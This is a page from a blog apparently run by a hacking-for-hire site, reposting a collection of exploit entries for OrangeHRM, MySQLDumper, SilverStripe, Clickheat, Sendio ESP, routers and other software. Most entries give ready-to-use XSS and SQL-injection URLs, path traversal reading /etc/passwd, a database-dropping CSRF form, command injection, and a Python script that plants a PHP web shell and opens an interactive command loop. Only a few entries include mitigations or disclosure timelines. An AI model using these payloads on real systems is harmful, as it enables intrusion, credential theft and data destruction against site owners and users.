Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863131771

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/53433/info
  
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
  
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. 

http://www.example.com/templates/hrfunct/emppop.php?reqcode=1&sortOrder1=%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/53433/info
 
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
 
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. 

http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId=1&newHspStatus=1%3Cscript%3Ealert %28document.cookie%29;%3C/script%3E&empId=1
HireHackking 
source: https://www.securityfocus.com/bid/53433/info

OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

OrangeHRM 2.7 RC is vulnerable; prior versions may also be affected. 

http://www.example.com/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20 OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,EN CODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202
HireHackking 
source: https://www.securityfocus.com/bid/53426/info

PHP Enter is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

PHP Enter 4.1.2 is vulnerable; other versions may also be affected. 

<form method="post" action="http://www.example.com/admin/banners.php">
<center>
<font color=#3A586A>Code</font><br />
<textarea name="code">&lt;/textarea&gt;
<br /><br />
<input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br/>
</form>
HireHackking 
source: https://www.securityfocus.com/bid/53427/info

The Linksys WRT54GL router is prone to a cross-site request-forgery vulnerability.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. 

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1
HireHackking 
source: https://www.securityfocus.com/bid/53413/info

JibberBook is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.

Attackers can exploit this issue to bypass authentication to gain administrative privileges ; this may aid in launching further attacks.

JibberBook 2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/Admin/Login_form.php?loggedin=true
HireHackking 
source: https://www.securityfocus.com/bid/53411/info

Ramui Forum Script is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com//gb/user/index.php?query=%22%20onmouseover%3dprompt%28991522%29%20bad%3d%22
HireHackking 
source: https://www.securityfocus.com/bid/53409/info

Multiple Schneider Electric Telecontrol products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied data before it is used in dynamic content.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.

The following products are affected:

Schneider Electric Telecontrol Kerweb versions prior to 3.0.1
Schneider Electric Telecontrol Kerwin versions prior to 6.0.1 

http://www.example.com/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=&gtvariablevalue=&ltvariablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=&gtdateapp=&ltdateapp=&gtdaterec=&ltdaterec=&evtvariablename=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/53398/info

Trombinoscope is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Trombinoscope 3.5 and prior versions are vulnerable. 

http://www.example.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--
HireHackking 
source: https://www.securityfocus.com/bid/53355/info

iGuard Security Access Control is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input in the embedded web server.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp
HireHackking 
source: https://www.securityfocus.com/bid/53310/info

MySQLDumper is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.

MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 

Vulnerable code section:
/*
//menu.php
if (isset($_POST['selected_config'])||isset($_GET['config']))
{
if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
// Configuration was switched in content frame?
if (isset($_GET['config'])) $new_config=$_GET['config'];
// restore the last active menuitem
if (is_readable($config['paths']['config'].$new_config.'.php'))
{
clearstatcache();
unset($databases);
$databases=array();
if (read_config($new_config))
{
$config['config_file']=$new_config;
$_SESSION['config_file']=$new_config; //$config['config_file'];
$config_refresh='
<script language="JavaScript" type="text/javascript">
if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
{
var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
}
else selected_div=\'\';
parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>';
}
if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern
}
}



*/
As you can see we can traverse it +

if we will look to read_config() function
//inc/functions_global.php

function read_config($file=false)
{
global $config,$databases;
$ret=false;
if (!$file) $file=$config['config_file'];
// protect from including external files
$search=array(':', 'http', 'ftp', ' ');
$replace=array('', '', '', '');
$file=str_replace($search,$replace,$file);

if (is_readable($config['paths']['config'].$file.'.php'))
{
// to prevent modern server from caching the new configuration we need to evaluate it this way
clearstatcache();
$f=implode('',file($config['paths']['config'].$file.'.php'));
$f=str_replace('<?php','',$f);
$f=str_replace('?>','',$f);
eval($f);
$config['config_file']=$file;
$_SESSION['config_file']=$config['config_file'];
$ret=true;
}
return $ret;
}

this means remote attacker can iterate his/her code as PHP.(Notice: eval($f))

Our exploit:
http://www.example.com/learn/cubemail/menu.php?config=../../ss
where ss = ss.php
#cat ss.php # in eg attacker uploaded his/her own file:
echo 'Our command executed ' . getcwd();
phpinfo();
HireHackking 
source: https://www.securityfocus.com/bid/53306/info
       
MySQLDumper is prone to multiple security vulnerabilities, including:
       
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
       
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
       
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 

http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;
HireHackking 
# Exploit Title: WordPress Free Counter Plugin [Stored XSS]
# Date: 2015/05/25
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://www.free-counter.org
# Software Link: https://wordpress.org/plugins/free-counter/
# Version: 1.1
# Tested on: WordPress 4.2.2
# Category: webapps
# CVE: CVE-2015-4084

1. Description

Any authenticated or non-authenticated user can perform a stored XSS 
attack simply by exploiting wp_ajax_nopriv_check_stat action.
Plugin uses a widget to display website's visits, so any page that 
contains this widget will also load the malicious JS code.

2. Proof of Concept

* Send a post request to `http://www.free-counter.org/Api.php` in order 
to reveal the counter id of the vulnerable site. The POST data must 
contain the following vars: 
`action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`
* As a response we get a serialized indexed array. The value that we 
need to know is the 'counter_id'.
* Send a post request to 
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: 
`action=check_stat&id_counter=<counter_id from step 
2>&value_=<script>alert(1)</script>`
* Visit a page of the infected website that displays plugin's widget.

Note that the plugin uses the update_option function to store the 
$_POST['value_'] contents to DB so any code inserted there will be 
escaped. Even though a malicious user can omit the quotes in the src 
attr of the script tag. Most modern browsers will treat the tag as they 
were there.

3. Solution

No official solution yet exists.
HireHackking 
source: https://www.securityfocus.com/bid/53306/info
     
MySQLDumper is prone to multiple security vulnerabilities, including:
     
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
     
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
     
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 

http://www.example.com/learn/cubemail/restore.php
http://www.example.com/learn/cubemail/dump.php
http://www.example.com/learn/cubemail/refresh_dblist.php
HireHackking 
source: https://www.securityfocus.com/bid/53306/info
      
MySQLDumper is prone to multiple security vulnerabilities, including:
      
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
      
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
      
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 

<img src="http://www.example.com/tld/meonyourpc.PNG" heigth="250" width="300" />
<form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
</form>
HireHackking 
source: https://www.securityfocus.com/bid/53306/info
    
MySQLDumper is prone to multiple security vulnerabilities, including:
    
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
    
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
    
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 

http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/53306/info
   
MySQLDumper is prone to multiple security vulnerabilities, including:
   
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
   
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
   
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 

http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1
HireHackking 
source: https://www.securityfocus.com/bid/53306/info
  
MySQLDumper is prone to multiple security vulnerabilities, including:
  
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
  
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
  
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 

http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation
HireHackking 
source: https://www.securityfocus.com/bid/53306/info
 
MySQLDumper is prone to multiple security vulnerabilities, including:
 
1. Multiple cross-site scripting vulnerabilities.
2. A local file-include vulnerability.
3. Multiple cross-site request-forgery vulnerabilities.
4. Multiple information-disclosure vulnerabilities.
5. A directory-traversal vulnerability.
 
Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
 
MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 

http://www.example.com/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/53301/info

PHP Volunteer Management is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Volunteer Management 1.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/mods/messages/data/get_messages.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10
HireHackking 
source: https://www.securityfocus.com/bid/53295/info

Uiga FanClub is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/[Patch]/index2.php?c=1&p=[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/53287/info

Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Croogo CMS 1.3.4 is vulnerable; other versions may also be affected. 

URL: http://www.example.com/croogo/admin/users

<td>"><iframe src="a" onload='alert("VL")' <<="" td=""> <td>"><iframe src=a onload=alert("VL")
<</td> <td>asdasd () aol com</td>

<td><a href="/croogo/admin/users/edit/2">Edit</a> <a href="/croogo/admin/users/delete/2/token:
c68c0779f65f5657a8d17c28daebcc7a15fe51e3"

onclick="return confirm('Are you sure?');">Delete</a></td></tr>


URL: http://www.example.com/croogo/admin/roles

<tr class="striped"><td>4</td> <td>"><iframe src="a" onload='alert("VL")'
<<="" td=""> <td>"><iframe src=a onload=alert("VL") <</td> <td>
<a href="/croogo/admin/roles/edit/4">Edit</a> <a href="/croogo/admin/roles/delete
HireHackking 
# source: https://www.securityfocus.com/bid/53282/info
# 
# SilverStripe is prone to a remote PHP code-injection vulnerability.
# 
# An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
# 
# SilverStripe 2.4.7 is vulnerable; other versions may also be affected. 
# 

#!/usr/bin/env python
# -*- coding:utf-8 -*-
import httplib, urllib, urllib2,sys, getopt
 
def Menu():
    print "\n\n-------------------------------------------------------"
    print "-Kullanim Klavuzu [ USAGE ]               "
    print "-------------------------------------------------------"
    print "- Temel Kullanim - I [ Default Usage ] :                  "
    print "-        python exo.py www.target.com /            \n"
    print "- Temel Kullanim - II [ Default Usage ] :                 "
    print "-        python exo.py www.target.com /path/          \n"
if (len(sys.argv) <= 2) or (len(sys.argv) > 3):
    Menu()
    exit(1)
host = sys.argv[1]
path = sys.argv[2]
 
print " [+] Exploit ediliyor..!"
payload="blackcandy');fwrite(fopen("
payload+='"../shellcik.php","w"), '
payload+="'<?php $gelen"
payload+='=@$_GET["gelen"]; echo shell_exec($gelen);?>'
parametreler = urllib.urlencode({'db[type]':'MySQLDatabase',
'db[MySQLDatabase][server]':'localhost',
'db[MySQLDatabase][username]':'root',
'db[MySQLDatabase][password]':'qwe123',
'db[MySQLDatabase][database]':'SS_mysite',
'db[MSSQLDatabase][server]':'localhost',
'db[MSSQLDatabase][username]':'root',
'db[MSSQLDatabase][password]':'qwe123',
'db[MSSQLDatabase][database]':'SS_mysite',
'db[PostgreSQLDatabase][server]':'localhost',
'db[PostgreSQLDatabase][username]':'root',
'db[PostgreSQLDatabase][password]':'qwe123',
'db[PostgreSQLDatabase][database]':'SS_mysite',
'db[SQLiteDatabase][path]':'/var/www/SilverStripe/assets/.db',
'db[SQLiteDatabase][database]':'SS_mysite',
'admin[username]':'admin',
'admin[password]':'qwe123',
'locale':'en_US',
'template':payload,
'stats':'on',
'go':'Installing SilverStripe...'})
print " [+]Parametreler olusturuldu [ Params Generated For Http Request ]"
basliklar = {"Content-type": "application/x-www-form-urlencoded",
             "Accept": "text/plain",
             "User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0",
             "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
             "Accept-Language":"en-us,en;q=0.5",
             "Accept-Encoding":"gzip, deflate",
             "Connection":"keep-alive",
             "Referer":"http://" + host + path+"install.php",
             "Cookie":"alc_enc=1%3Aa9dbf14198a8f6bd9dd2d2c3e41e7164fb206d76; PastMember=1; PHPSESSID=0d7k4e661jd96i0u64vij68am3; phpbb3_srzvs_k=; phpbb3_srzvs_u=2; phpbb3_srzvs_sid=ede0a17fc1f375d6a633f291119c92d7; style_cookie=null; PHPSESSID=j7nr6uro3jc5tulodfeoum3u90; fws_cust=mince%232%23d41d8cd98f00b204e9800998ecf8427e"
}
print " [+]Basliklar olusturuldu [ Headers Generated For Http Request ]"
conn = httplib.HTTPConnection("localhost:80")
conn.request("POST",str(path) +"install.php",parametreler,basliklar)
responce = conn.getresponse()
if responce.status != 200:
    print "[+]Http Hatasi : " + responce.status + "\n"
    print "Cant Exploit!:("
if responce.status == 200:
    komut=""
    while( komut != "exit" ):
        komut = urllib.quote_plus(str(raw_input("Shell :) => ")))
        print urllib2.urlopen("http://" + host + path+"shellcik.php?gelen="+komut).read()
HireHackking 
Clickheat 1.13+ Unauthenticated RCE
-----------------------------------

The Clickheat developers have been informed, but have not responded to my email. The code has not been updated recently and the project seems to be in an abandoned state.

I have discovered a vulnerability in Clickheat 1.13 onwards that would allow an attacker to execute arbitrary commands on the remote webserver, in the context of the user running the webserver, without authentication. This could lead to unauthenticated access to the Clickheat web application, and potentially complete takeover of the remote webserver.
 
For the exploit to be successful, the webserver (Apache was tested in this case) must be configured to handle Perl (.pl) scripts and have the ExecCGI directive present in the VirtualHost configuration.
 
The issue stems from a script called parseClickLogs.pl in the /scripts directory of clickheat. If the Apache configuration is setup as above, this script will be executed when a user visits /clickheat/scripts/parseClickLogs.pl, as shown in Apache logs:
 
[Tue May 12 13:36:27.068012 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] AH01215: usage: ./parseClickLogs.pl apache_logs_file dest_path [domain_ignored]
[Tue May 12 13:36:27.070133 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] End of script output before headers: parseClickLogs.pl
 
Arbitrary parameters can be supplied to the script directly from the URL, separated by +'s.
 
In the script, on line 48 is a vulnerable open() command:
 
open(LOGFILE, $srcFile) or die("Impossible d'ouvrir le fichier ".$srcFile);
 
The open() command is vulnerable because the $srcFile parameter has not been sanitized in any way, it is simply the first parameter passed into the script. Also the open() command has not been explicitly set for input only, meaning its behavior can be manipulated by appending a pipe (|) symbol to input parameters. See here for discussion: http://www.cgisecurity.com/lib/sips.html.
 
POC
----
The following POC shows how to gain access to the Clickheat configuration data by copying /clickheat/config/config.php to a plain text file for viewing.
 
- Copy config.php using arbitrary commands on the server:
GET /clickheat/scripts/parseClickLogs.pl?cp ../config/config.php conf.txt|+two
 
- View newly created copy of config.php (\ is appended to the filename)
GET /clickheat/scripts/conf.txt\
 
Mitigation
----------
A simple mitigation would be to either remove this script if it is not required by the core functionality of Clickheat, or move it outside of the publicly accessible HTML path. You could also explicitly set the open() to only allow for input, such as:
 
open(LOGFILE, "<$srcFile") or die("Impossible d'ouvrir le fichier ".$srcFile);
HireHackking 
1. Advisory Information

Title: Sendio ESP Information Disclosure Vulnerability
Advisory ID: CORE-2015-0010
Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability
Date published: 2015-05-22
Date of last update: 2015-05-22
Vendors contacted: Sendio
Release mode: Coordinated release


2. Vulnerability Information

Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0999, CVE-2014-8391



3. Vulnerability Description

Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus solutions for enterprises. Two information disclosure issues were found affecting some versions of this software, and can lead to leakage of sensitive information such as user's session identifiers and/or user's email messages.


4. Vulnerable Packages

Sendio 6 (14.1120.0)
Other products and versions might be affected too, but they were not tested.


5. Vendor Information, Solutions and Workarounds

Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed on Sendio software Version 7.2.4.

For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions and not HTTPS web sessions. Sendio recommends that customers who have not upgraded to Version 7.2.4 should disallow HTTP on their Sendio product and only use HTTPS.


6. Credits

This vulnerability was discovered and researched by Martin Gallo from Core Security's Consulting Services Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security's Advisories Team.


7. Technical Description / Proof of Concept Code

7.1. Disclosure of session cookie in Web interface URLs

The Sendio [1] ESP Web interface authenticates users with a session cookie named "jsessionid". The vulnerability [CVE-2014-0999] is caused due the way the Sendio ESP Web interface handles this authentication cookie, as the "jsessionid" cookie value is included in URLs when obtaining the content of emails. The URLs used by the application follow this format:

 
      http://<ESP-web-interface-domain>:<ESP-web-interface-port>/sendio/ice/cmd/msg/body;jsessionid=<session-identifier-value>?id=<message-id>
         
This causes the application to disclose the session identifier value, allowing attackers to perform session hijacking. An attacker might perform this kind of attack by sending an email message containing links or embedded image HTML tags pointing to a controlled web site, and then accessing the victim's session cookies through the "Referrer" HTTP header. Accessing this authentication cookie might allow an attacker to hijack a victim's session and obtain access to email messages or perform actions on behalf of the victim.

7.2. Response mixup in Web interface

The vulnerability [CVE-2014-8391] is caused by an improper handling of users' sessions by the Web interface. Under certain conditions, this could lead to the server disclosing sensitive information that was intended for a different user. This information includes, for instance, other users' session identifiers, email message identifiers or email message subjects. In order to trigger this vulnerability, requests should be authenticated.

The following Python script can be used to trigger this vulnerability under certain circumstances:

 
import requests

domain = "target.domain.com"                     # The target domain
port = 8888                                      # The target port
jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"  # A valid jsessionid
num = 100000                                     # No of request to make
msgid = 9999999                                  # A valid message id to baseline the requests

url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, jsessionid)


def make_request(id):
    params = {"id": str(id)}
    headers = {"Cookie": "JSESSIONID=%s" % jsessionid}
    return requests.get(url, params=params, headers=headers)


print "[*] Reaching the target to define baseline"
r = make_request(msgid)
baseline_length = r.headers["content-length"]
print "[*] Defined baseline: %d bytes" % baseline_length

for id in range(0, num):
    r = make_request(msgid)
    rlength = int(r.headers["content-length"])
    if r.status_code == 200 and rlength != baseline_length:
        print "\t", r.status_code, rlength, r.text
    else:
        print "\t", r.status_code, rlength
 


8. Report Timeline

2015-03-26: Core Security sent an initial notification to Sendio informing them that multiple vulnerabilities were found in one of their products, and requested their PGP keys in order to start an encrypted communication.
2015-03-27: Sendio replied that they would not be able to use PGP keys, but stated that their In/out SMTP gateway uses TLS, so that should suffice. They detailed that they were working on a fix for the "CS_SENDIO_JSESSIONID_DISCLOSURE" vulnerability and estimated it would be released by the end of April, 2015. They requested additional technical details for the "CS_SENDIO_INFO_LEAK" vulnerability.
2015-03-30: Core Security informed that understood that Sendio may not be able to use PGP keys, but Core doesn't consider the use of TLS as a replacement for PGP. Core Security requested to receive confirmation from Sendio in case they wanted to keep the communications unencrypted with PGP in order to send them a draft version of the advisory.
2015-03-30: Sendio confirmed that the communication can remain "as is" without PGP. They will inform Core once they have a specific date for publishing the fix. Sendio requested a PoC for the "CS_SENDIO_INFO_LEAK vulnerability".
2015-03-31: Core Security sent a draft version of the advisory and PoC to Sendio.
2015-03-31: Sendio confirmed reception of the advisory and PoC and informed Core that they would provide an update on their test on April 6.
2015-04-06: Sendio informed Core that they were able to reproduce the "CS_SENDIO_INFO_LEAK" issue and that were still analyzing it in order to create a fix.
2015-04-07: Core Security requested an estimated date for the release of a fix/update.
2015-04-13: Core Security again requested an answer from Sendio regarding the release of a fix/update.
2015-04-13: Sendio informed Core they were still working on a fix for the JSession issue that covers all use cases across Microsoft Outlook and the various supported web browsers. For the "CS_SENDIO_INFO_LEAK" they had coded a fix that was undergoing a System Test. Sendio estimated the release would take place on May 15, 2015.
2015-04-20: Sendio informed Core they were still planning to release the fixes by May 15, 2015.
2015-04-20: Core Security thanked Sendio for the update and informed them they would schedule their security advisory accordingly.
2015-04-24: Core Security requested that Sendio delay the release date of the fixes until Monday, May 18 in order to avoid publishing them on a Friday.
2015-04-27: Sendio informed Core that many of their customers have their Sendio systems set to "automatically update" on weekends. Sendio requested Core publish their advisory a week after the fix is published. Sendio also requested the ability to add some workarounds into Core's advisory.
2015-04-28: Core Security informed Sendio that they understood their update policy and let them know that it is Core's policy to publish their advisory the same day the fix is released in order to inform the affected users of its availability. Core also stated that they were willing to add any workarounds Sendio proposed.
2015-05-05: Sendio informed Core that they were still having problems developing a fix for the JSession vulnerability, therefore they may have to postpone the release date from May 15 to May 22.
2015-05-07: Core Security thanked Sendio for the update and requested to be kept informed in order to have enough time to schedule their advisory.
2015-05-12: Sendio confirmed that they needed to delay the publication of the fixes until May 21. Additionally, Sendio sent Core the proposed workarounds to be added in Core's advisory and requested a draft copy of it.
2015-05-15: Core Security informed Sendio it would reschedule the publication of their advisory and would send them a draft copy of it once they produced the final version.
2015-05-20: Sendio informed Core that they would publish the fixes at 10 PM, May 21.
2015-05-20: Core Security informed Sendio that based on their publication time they would have to delay the release of the advisory until Friday 22.
2015-05-22: Advisory CORE-2015-0010 published.


9. References

[1] http://www.sendio.com/. 


10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.


11. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.


12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.